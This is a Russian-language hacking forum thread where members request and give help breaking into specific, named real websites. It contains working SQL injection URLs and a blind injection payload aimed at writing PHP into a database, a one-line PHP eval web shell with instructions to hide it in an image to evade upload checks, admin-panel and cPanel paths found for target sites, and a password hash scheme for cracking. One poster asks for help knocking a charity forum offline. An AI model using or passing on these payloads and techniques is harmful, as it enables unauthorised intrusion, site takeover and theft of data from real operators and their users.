Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Двойной запрос.
    Крути как слепую.
     
  2. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://www.editrans.de/?view=article&id=6+and+substring(version(),1,1)=5

    а вот так не прокатило


    http://www.editrans.de/?view=article&id=-6+or(1,1)=(select+count(0),concat((select+version()+from+information_schema.tables+limit+0,1),floor(rand(0)*2))from(information_schema.tables)group+by+2)--+
     
    _________________________
    #13742 Konqi, 22 Jun 2010
    Last edited: 22 Jun 2010
  3. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Code:
    http://www.editrans.de/?view=article&id=6+and+substring(version(),1,1)=5
    Вот так и крути.

    Оффтоп: цитировать предыдущее сообщение не нужно :)
     
    1 person likes this.
  4. InfectedM

    InfectedM Elder - Старейшина

    Joined:
    4 Nov 2007
    Messages:
    155
    Likes Received:
    12
    Reputations:
    0
    Где IPB 3+ хранит соль?
    И какой алгаритм шифровки искользуется?

    Везде написано что в members_pass_salt ,но чет не видать( может быть что без соли ?


    Columns: Table ibf_members
    name
    mgroup
    email
    joined
    ip_address
    posts
    title
    allow_admin_mails
    time_offset
    hide_email
    email_pm
    email_full
    skin
    warn_level
    warn_lastwarn
    language
    last_post
    restrict_post
    view_sigs
    view_img
    view_avs
    view_pop
    bday_day
    bday_month
    bday_year
    new_msg
    msg_total
    show_popup
    misc
    last_visit
    last_activity
    dst_in_use
    view_prefs
    coppa_user
    mod_posts
    auto_track
    orig_name
    lastnamechange
    namehistory
    org_perm_id
    temp_ban
    sub_end
    login_anonymous
    ignored_users
    mgroup_others
    member_login_key
    member_login_key_expire
    subs_pkg_chosen
    has_blog
    members_auto_dst
    members_cache
    members_disable_pm
    members_display_name
    members_created_remote
    members_editor_choice
    members_markers
    members_profile_views
    members_l_display_name
    members_l_username
    failed_logins
    failed_login_count
    has_gallery
    gallery_perms
    t23_pcr_time
    ip_geo
     
  5. Bramin

    Bramin Banned

    Joined:
    15 May 2009
    Messages:
    187
    Likes Received:
    88
    Reputations:
    27
    http://www.elixirherbals.com <-- не могу найти админку
     
  6. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    md5(md5($salt).md5($pass))
     
    _________________________
  7. Dare

    Dare Elder - Старейшина

    Joined:
    26 Apr 2010
    Messages:
    53
    Likes Received:
    24
    Reputations:
    17
    http://www.lstc.edu
    Буду безумно благодарен, если кто поможет найти админку
     
  8. BlackFan

    BlackFan Member

    Joined:
    3 Jan 2009
    Messages:
    47
    Likes Received:
    40
    Reputations:
    32
    Вот это нашел только, хз то или нет)

    2 Dare
    http://www.lstc.edu/intranet/

    2 Bramin
    http://www.elixirherbals.com:2082/
     
  9. Train

    Train Member

    Joined:
    9 Jan 2009
    Messages:
    21
    Likes Received:
    10
    Reputations:
    4
    PHP:
    http://lstcnet.lstc.edu/ics
    Вот это не подойдет?

    А вообще ты глянь из какой ты базы данных хочешь пароли-явки взять.
     
    #13749 Train, 23 Jun 2010
    Last edited: 23 Jun 2010
    1 person likes this.
  10. se55555

    se55555 New Member

    Joined:
    23 Jun 2010
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Парни, всем привет. В общем не мое это дело, ломать форумы, я обычный программист, но стала такая ситуация очень нужной, а разобраться до самого последнего конца не могу.
    Есть форум: _forum.help-animal. org.ua
    Настоящая организация уже давно уехала с форума, делает себе новый сайт, а владелец этого форума еще пишет от ихнего имени.
    Цель: Сделать сайт недоступным для общества.
    Я так понял, форум вообще не защищен, так как устанавливали люди, которые в этом деле не совсем разбираются.
    Я понимаю, что никто на блюдечке мне не принесет пароль администратора, по этому прошу хотя-бы подсказать путь, в каком направлении мне двигаться.
    Буду раз за помощь.

    В данной ситуации я смог только увидеть chenlog.html, установить Perl и начать запускать готовые pl скрипты, но дальше тупик. Понять суть заливания шелов тоже не могу, подмена печенек в этой версии форума, как я понял невозможна, за sql "прививки" вообще молчу :). Так-что я продвинулся не так далеко, как бы хотел.
     
    #13750 se55555, 23 Jun 2010
    Last edited: 23 Jun 2010
  11. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    Оно и не удивительно, вопрос на засыпку, почему второй вариант должен был прокатить то? :rolleyes:
     
  12. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    ды сам не знаю,просто так написал..

    а вот крутит старым добрым блайнд-ом не охота ((
     
    _________________________
  13. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    http://www.elixirherbals.com/backoffice/
     
  14. k2b1~

    k2b1~ Banned

    Joined:
    17 Jun 2010
    Messages:
    16
    Likes Received:
    1
    Reputations:
    0
    есть админка..заливаю .php шелл не заливается..
    долjна бить .jpg или .gif//
    пробовал .php.%00jpg а тепер написаваются долjна бить картинка 800х800..
    а как обходит ето ?
    и пробовал менще размерниы (кб) шелл тоjэ такое..800х800//
     
  15. m0Hze

    m0Hze Well-Known Member

    Joined:
    1 Nov 2008
    Messages:
    266
    Likes Received:
    655
    Reputations:
    208
    Возьми картинку любую, до 800х800, открой блокнотом и в самый конец файла впиши код простого шела, например
    PHP:
    <?php eval(stripslashes($_REQUEST[c]));?>
    И попробуй залить. При таком раскладе картинка должна пройти всякие там getimagesize и прочее.
     
    5 people like this.
  16. se55555

    se55555 New Member

    Joined:
    23 Jun 2010
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
  17. k2b1~

    k2b1~ Banned

    Joined:
    17 Jun 2010
    Messages:
    16
    Likes Received:
    1
    Reputations:
    0
    pomoq spasib..
     
  18. k2b1~

    k2b1~ Banned

    Joined:
    17 Jun 2010
    Messages:
    16
    Likes Received:
    1
    Reputations:
    0
    youthparliament.am
    админку не моqу наыти..
    если кто смоjэт помоqите поялуста..
    /admin пробовал.
     
  19. IMMORTAL_S

    IMMORTAL_S Member

    Joined:
    29 Apr 2010
    Messages:
    129
    Likes Received:
    9
    Reputations:
    2
    blind sql

    Всем привет!
    Кручу blind вида(в поле ввода мыла):
    Code:
    [email protected]' and (select if((select user from mysql.user limit 1)='root',1,0))='1
    У пользователя есть права на insert/update, если можно, то как изменить запрос, чтобы можно было внести изменения в таблицу.
    Ну т.е. я хочу в таблицу с новостями добавить php-код.
    Прокатит ли такое?
     
  20. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    ну как на /admin нет прав, вот попробуй cPanel http://www.youthparliament.am/cpanel/
     
Thread Status:
Not open for further replies.